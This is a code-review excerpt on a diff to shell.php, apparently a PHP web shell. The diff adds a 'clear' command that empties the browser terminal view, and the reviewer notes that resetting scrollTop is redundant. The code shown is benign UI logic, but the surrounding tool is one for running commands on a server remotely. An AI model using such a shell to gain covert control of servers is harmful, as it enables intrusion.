shell.php

```diff
@@ -236,6 +236,10 @@ function featureShell(command) {
                 _insertCommand(command);
                 if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
                     featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
+                } else if (/^\s*clear\s*$/.test(command)) {
+                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
+                    eShellContent.innerHTML = '';
+                    eShellContent.scrollTop = eShellContent.scrollHeight;
```

Comment:
Why changing `scrollTop`? As you empty the element, it will work without that :)